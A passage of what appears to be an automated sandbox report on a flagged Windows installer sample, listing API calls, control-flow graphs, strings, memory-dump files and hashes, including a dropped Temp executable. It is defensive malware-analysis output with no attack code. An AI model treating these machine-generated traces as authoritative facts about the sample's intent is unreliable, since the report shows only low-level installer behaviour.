                                                                                                                                                                  APIs
                                                                                                                                                                  • DeleteFileA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 0040550A
                                                                                                                                                                  • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsa91F7.tmp\*.*,\*.*,C:\Users\user~1\AppData\Local\Temp\nsa91F7.tmp\*.*,?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 00405554
                                                                                                                                                                  • lstrcatA.KERNEL32(?,00409010,?,C:\Users\user~1\AppData\Local\Temp\nsa91F7.tmp\*.*,?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 00405575
                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,00409010,?,C:\Users\user~1\AppData\Local\Temp\nsa91F7.tmp\*.*,?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 0040557B
                                                                                                                                                                  • FindFirstFileA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\nsa91F7.tmp\*.*,?,?,?,00409010,?,C:\Users\user~1\AppData\Local\Temp\nsa91F7.tmp\*.*,?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 0040558C
                                                                                                                                                                  • FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 0040563E
                                                                                                                                                                  • FindClose.KERNELBASE(?), ref: 0040564F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                  • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\nsa91F7.tmp\*.*$\*.*
                                                                                                                                                                  • API String ID: 2035342205-3669090619
                                                                                                                                                                  • Opcode ID: 40143870f9552ccee50e4944eef29081e6212fcf3057c5d2d5961ee8f08c50da
                                                                                                                                                                  • Instruction ID: 3bcb6ec240d98e814f0ac214cdfa27fda4082eb57bc811e5fc2e7534dee8d376
                                                                                                                                                                  • Opcode Fuzzy Hash: 40143870f9552ccee50e4944eef29081e6212fcf3057c5d2d5961ee8f08c50da
                                                                                                                                                                  • Instruction Fuzzy Hash: E0512430404A447ADF216B328C49BBF3AB8DF52319F54443BF809751D2CB3C59829EAD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 669 405ec2-405ed6 FindFirstFileA 670 405ee3 669->670 671 405ed8-405ee1 FindClose 669->671 672 405ee5-405ee6 670->672 671->672
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileA.KERNELBASE(?,0042C0F0,C:\,004057DE,C:\,C:\,00000000,C:\,C:\,?,?,?,00405500,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 00405ECD
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00405ED9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                  • String ID: C:\
                                                                                                                                                                  • API String ID: 2295610775-3404278061
                                                                                                                                                                  • Opcode ID: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
                                                                                                                                                                  • Instruction ID: 29e96ad6865097314c3b976147751eb8d0045a3fb470af3f15328f49aab52e00
                                                                                                                                                                  • Opcode Fuzzy Hash: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
                                                                                                                                                                  • Instruction Fuzzy Hash: 11D0C9319185209BC2105768AD0885B6A59DB593357108A72B465F62E0CA7499528AEA
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 132 4039b0-4039c2 133 403b03-403b12 132->133 134 4039c8-4039ce 132->134 136 403b61-403b76 133->136 137 403b14-403b5c GetDlgItem * 2 call 403e83 SetClassLongA call 40140b 133->137 134->133 135 4039d4-4039dd 134->135 138 4039f2-4039f5 135->138 139 4039df-4039ec SetWindowPos 135->139 141 403bb6-403bbb call 403ecf 136->141 142 403b78-403b7b 136->142 137->136 144 4039f7-403a09 ShowWindow 138->144 145 403a0f-403a15 138->145 139->138 150 403bc0-403bdb 141->150 147 403b7d-403b88 call 401389 142->147 148 403bae-403bb0 142->148 144->145 151 403a31-403a34 145->151 152 403a17-403a2c DestroyWindow 145->152 147->148 169 403b8a-403ba9 SendMessageA 147->169 148->141 149 403e50 148->149 157 403e52-403e59 149->157 155 403be4-403bea 150->155 156 403bdd-403bdf call 40140b 150->156 160 403a36-403a42 SetWindowLongA 151->160 161 403a47-403a4d 151->161 158 403e2d-403e33 152->158 165 403bf0-403bfb 155->165 166 403e0e-403e27 DestroyWindow EndDialog 155->166 156->155 158->149 163 403e35-403e3b 158->163 160->157 167 403af0-403afe call 403eea 161->167 168 403a53-403a64 GetDlgItem 161->168 163->149 171 403e3d-403e46 ShowWindow 163->171 165->166 172 403c01-403c4e call 405be9 call 403e83 * 3 GetDlgItem 165->172 166->158 167->157 173 403a83-403a86 168->173 174 403a66-403a7d SendMessageA IsWindowEnabled 168->174 169->157 171->149 202 403c50-403c55 172->202 203 403c58-403c94 ShowWindow EnableWindow call 403ea5 EnableWindow 172->203 177 403a88-403a89 173->177 178 403a8b-403a8e 173->178 174->149 174->173 179 403ab9-403abe call 403e5c 177->179 180 403a90-403a96 178->180 181 403a9c-403aa1 178->181 179->167 183 403ad7-403aea SendMessageA 180->183 184 403a98-403a9a 180->184 181->183 185 403aa3-403aa9 181->185 183->167 184->179 188 403ac0-403ac9 call 40140b 185->188 189 403aab-403ab1 call 40140b 185->189 188->167 199 403acb-403ad5 188->199 198 403ab7 189->198 198->179 199->198 202->203 206 403c96-403c97 203->206 207 403c99 203->207 208 403c9b-403cc9 GetSystemMenu EnableMenuItem SendMessageA 206->208 207->208 209 403ccb-403cdc SendMessageA 208->209 210 403cde 208->210 211 403ce4-403d1d call 403eb8 call 405bc7 lstrlenA call 405be9 SetWindowTextA call 401389 209->211 210->211 211->150 220 403d23-403d25 211->220 220->150 221 403d2b-403d2f 220->221 222 403d31-403d37 221->222 223 403d4e-403d62 DestroyWindow 221->223 222->149 224 403d3d-403d43 222->224 223->158 225 403d68-403d95 CreateDialogParamA 223->225 224->150 226 403d49 224->226 225->158 227 403d9b-403df2 call 403e83 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 225->227 226->149 227->149 232 403df4-403e0c ShowWindow call 403ecf 227->232 232->158
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039EC
                                                                                                                                                                  • ShowWindow.USER32(?), ref: 00403A09
                                                                                                                                                                  • DestroyWindow.USER32 ref: 00403A1D
                                                                                                                                                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A39
                                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403A5A
                                                                                                                                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A6E
                                                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403A75
                                                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403B23
                                                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403B2D
                                                                                                                                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403B47
                                                                                                                                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B98
                                                                                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403C3E
                                                                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00403C5F
                                                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00403C71
                                                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00403C8C
                                                                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CA2
                                                                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 00403CA9
                                                                                                                                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CC1
                                                                                                                                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CD4
                                                                                                                                                                  • lstrlenA.KERNEL32(0042A0A0,?,0042A0A0,ylpuxzibyo Setup), ref: 00403CFD
                                                                                                                                                                  • SetWindowTextA.USER32(?,0042A0A0), ref: 00403D0C
                                                                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 00403E40
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                  • String ID: ylpuxzibyo Setup
                                                                                                                                                                  • API String ID: 184305955-784736266
                                                                                                                                                                  • Opcode ID: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
                                                                                                                                                                  • Instruction ID: f9ad972cf69bfdf420a9f6130eb54bdd223da945896b7aa78364cccc95eacf8d
                                                                                                                                                                  • Opcode Fuzzy Hash: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
                                                                                                                                                                  • Instruction Fuzzy Hash: 9FC1D331604204AFDB21AF62ED45E2B3F6CEB44706F50053EF641B52E1C779A942DB5E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 235 40361a-403632 call 405f57 238 403634-403644 call 405b25 235->238 239 403646-40366d call 405aae 235->239 248 403690-4036b9 call 4038e3 call 40579b 238->248 244 403685-40368b lstrcatA 239->244 245 40366f-403680 call 405aae 239->245 244->248 245->244 253 403740-403748 call 40579b 248->253 254 4036bf-4036c4 248->254 260 403756-40377b LoadImageA 253->260 261 40374a-403751 call 405be9 253->261 254->253 256 4036c6-4036ea call 405aae 254->256 256->253 262 4036ec-4036ee 256->262 264 403781-4037b7 RegisterClassA 260->264 265 40380a-403812 call 40140b 260->265 261->260 266 4036f0-4036fd call 4056e5 262->266 267 4036ff-40370b lstrlenA 262->267 268 4038d9 264->268 269 4037bd-403805 SystemParametersInfoA CreateWindowExA 264->269 278 403814-403817 265->278 279 40381c-403827 call 4038e3 265->279 266->267 273 403733-40373b call 4056ba call 405bc7 267->273 274 40370d-40371b lstrcmpiA 267->274 272 4038db-4038e2 268->272 269->265 273->253 274->273 277 40371d-403727 GetFileAttributesA 274->277 281 403729-40372b 277->281 282 40372d-40372e call 405701 277->282 278->272 288 4038b0-4038b8 call 404f85 279->288 289 40382d-403847 ShowWindow call 405ee9 279->289 281->273 281->282 282->273 296 4038d2-4038d4 call 40140b 288->296 297 4038ba-4038c0 288->297 294 403853-403865 GetClassInfoA 289->294 295 403849-40384e call 405ee9 289->295 300 403867-403877 GetClassInfoA RegisterClassA 294->300 301 40387d-4038a0 DialogBoxParamA call 40140b 294->301 295->294 296->268 297->278 302 4038c6-4038cd call 40140b 297->302 300->301 306 4038a5-4038ae call 40356a 301->306 302->278 306->272
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                                                                                                    • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                                                                                                  • lstrcatA.KERNEL32(1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user~1\AppData\Local\Temp\,?,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe",00000000), ref: 0040368B
                                                                                                                                                                  • lstrlenA.KERNEL32("C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ,?,?,?,"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ,00000000,C:\Users\user~1\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user~1\AppData\Local\Temp\), ref: 00403700
                                                                                                                                                                  • lstrcmpiA.KERNEL32(?,.exe), ref: 00403713
                                                                                                                                                                  • GetFileAttributesA.KERNEL32("C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ), ref: 0040371E
                                                                                                                                                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user~1\AppData\Local\Temp), ref: 00403767
                                                                                                                                                                    • Part of subcall function 00405B25: wsprintfA.USER32 ref: 00405B32
                                                                                                                                                                  • RegisterClassA.USER32 ref: 004037AE
                                                                                                                                                                  • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004037C6
                                                                                                                                                                  • CreateWindowExA.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004037FF
                                                                                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403835
                                                                                                                                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,0042E3C0), ref: 00403861
                                                                                                                                                                  • GetClassInfoA.USER32(00000000,RichEdit,0042E3C0), ref: 0040386E
                                                                                                                                                                  • RegisterClassA.USER32(0042E3C0), ref: 00403877
                                                                                                                                                                  • DialogBoxParamA.USER32(?,00000000,004039B0,00000000), ref: 00403896
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                  • String ID: mo$"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" $"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                  • API String ID: 1975747703-3631607734
                                                                                                                                                                  • Opcode ID: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
                                                                                                                                                                  • Instruction ID: 439cf4cca7a437fbaee012d0436cdd450a481f2d9ea16570e6e497c3a9acd7f8
                                                                                                                                                                  • Opcode Fuzzy Hash: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
                                                                                                                                                                  • Instruction Fuzzy Hash: 4861C6B16042007EE220BF629C45E273AACEB44759F44447FF941B62E2DB7DA9418A3E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 309 402c55-402ca3 GetTickCount GetModuleFileNameA call 40589e 312 402ca5-402caa 309->312 313 402caf-402cdd call 405bc7 call 405701 call 405bc7 GetFileSize 309->313 314 402e87-402e8b 312->314 321 402ce3 313->321 322 402dca-402dd8 call 402bf1 313->322 324 402ce8-402cff 321->324 328 402dda-402ddd 322->328 329 402e2d-402e32 322->329 326 402d01 324->326 327 402d03-402d05 call 4030b0 324->327 326->327 333 402d0a-402d0c 327->333 331 402e01-402e2b GlobalAlloc call 4030e2 call 402e8e 328->331 332 402ddf-402df0 call 4030e2 call 4030b0 328->332 329->314 331->329 360 402e3e-402e4f 331->360 349 402df5-402df7 332->349 335 402d12-402d19 333->335 336 402e34-402e3c call 402bf1 333->336 340 402d95-402d99 335->340 341 402d1b-402d2f call 40585f 335->341 336->329 345 402da3-402da9 340->345 346 402d9b-402da2 call 402bf1 340->346 341->345 358 402d31-402d38 341->358 351 402db8-402dc2 345->351 352 402dab-402db5 call 405fc6 345->352 346->345 349->329 355 402df9-402dff 349->355 351->324 359 402dc8 351->359 352->351 355->329 355->331 358->345 364 402d3a-402d41 358->364 359->322 361 402e51 360->361 362 402e57-402e5c 360->362 361->362 365 402e5d-402e63 362->365 364->345 366 402d43-402d4a 364->366 365->365 368 402e65-402e80 SetFilePointer call 40585f 365->368 366->345 367 402d4c-402d53 366->367 367->345 369 402d55-402d75 367->369 372 402e85 368->372 369->329 371 402d7b-402d7f 369->371 373 402d81-402d85 371->373 374 402d87-402d8f 371->374 372->314 373->359 373->374 374->345 375 402d91-402d93 374->375 375->345
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402C66
                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe,00000400), ref: 00402C82
                                                                                                                                                                    • Part of subcall function 0040589E: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe,80000000,00000003), ref: 004058A2
                                                                                                                                                                    • Part of subcall function 0040589E: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe,80000000,00000003), ref: 00402CCE
                                                                                                                                                                  Strings
                                                                                                                                                                  • C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe, xrefs: 00402C6C, 00402C7B, 00402C8F, 00402CAF
                                                                                                                                                                  • C:\Users\user\Desktop, xrefs: 00402CB0, 00402CB5, 00402CBB
                                                                                                                                                                  • Inst, xrefs: 00402D3A
                                                                                                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E2D
                                                                                                                                                                  • Lno, xrefs: 00402E7B
                                                                                                                                                                  • mo, xrefs: 00402E42
                                                                                                                                                                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402C5F
                                                                                                                                                                  • "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe", xrefs: 00402C55
                                                                                                                                                                  • soft, xrefs: 00402D43
                                                                                                                                                                  • Null, xrefs: 00402D4C
                                                                                                                                                                  • Error launching installer, xrefs: 00402CA5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                  • String ID: mo$"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Lno$Null$soft
                                                                                                                                                                  • API String ID: 4283519449-3357492638
                                                                                                                                                                  • Opcode ID: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
                                                                                                                                                                  • Instruction ID: 196f3fd9364ed88bbd27218647615838fe3130e8ea263fbe41a0cbd6df82c613
                                                                                                                                                                  • Opcode Fuzzy Hash: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
                                                                                                                                                                  • Instruction Fuzzy Hash: 6A510871941218ABDB609F66DE89B9E7BB8EF00314F10403BF904B62D1CBBC9D418B9D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 445 402e8e-402ea2 446 402ea4 445->446 447 402eab-402eb4 445->447 446->447 448 402eb6 447->448 449 402ebd-402ec2 447->449 448->449 450 402ed2-402edf call 4030b0 449->450 451 402ec4-402ecd call 4030e2 449->451 455 402ee5-402ee9 450->455 456 40305b 450->456 451->450 457 403044-403046 455->457 458 402eef-402f38 GetTickCount 455->458 459 40305d-40305e 456->459 463 403048-40304b 457->463 464 40309b-40309f 457->464 460 4030a6 458->460 461 402f3e-402f46 458->461 462 4030a9-4030ad 459->462 460->462 465 402f48 461->465 466 402f4b-402f59 call 4030b0 461->466 469 403050-403059 call 4030b0 463->469 470 40304d 463->470 467 403060-403066 464->467 468 4030a1 464->468 465->466 466->456 479 402f5f-402f68 466->479 473 403068 467->473 474 40306b-403079 call 4030b0 467->474 468->460 469->456 478 4030a3 469->478 470->469 473->474 474->456 482 40307b-40308e WriteFile 474->482 478->460 481 402f6e-402f8e call 406034 479->481 488 402f94-402fa7 GetTickCount 481->488 489 40303c-40303e 481->489 484 403040-403042 482->484 485 403090-403093 482->485 484->459 485->484 487 403095-403098 485->487 487->464 490 402fa9-402fb1 488->490 491 402fec-402ff0 488->491 489->459 494 402fb3-402fb7 490->494 495 402fb9-402fe9 MulDiv wsprintfA call 404eb3 490->495 492 403031-403034 491->492 493 402ff2-402ff5 491->493 492->461 498 40303a 492->498 496 403017-403022 493->496 497 402ff7-40300b WriteFile 493->497 494->491 494->495 495->491 502 403025-403029 496->502 497->484 501 40300d-403010 497->501 498->460 501->484 503 403012-403015 501->503 502->481 504 40302f 502->504 503->502 504->460
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402EF5
                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402F9C
                                                                                                                                                                  • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402FC5
                                                                                                                                                                  • wsprintfA.USER32 ref: 00402FD5
                                                                                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,0041924B,7FFFFFFF,00000000), ref: 00403003
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CountTick$FileWritewsprintf
                                                                                                                                                                  • String ID: ... %d%%$HLA$HLA$ionAndSpinCount$uOA
                                                                                                                                                                  • API String ID: 4209647438-1493548530
                                                                                                                                                                  • Opcode ID: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
                                                                                                                                                                  • Instruction ID: 15109c7e5c0d48913ae26536c30eb2ff4c12f072ab55fd5dd83b367320b2a29b
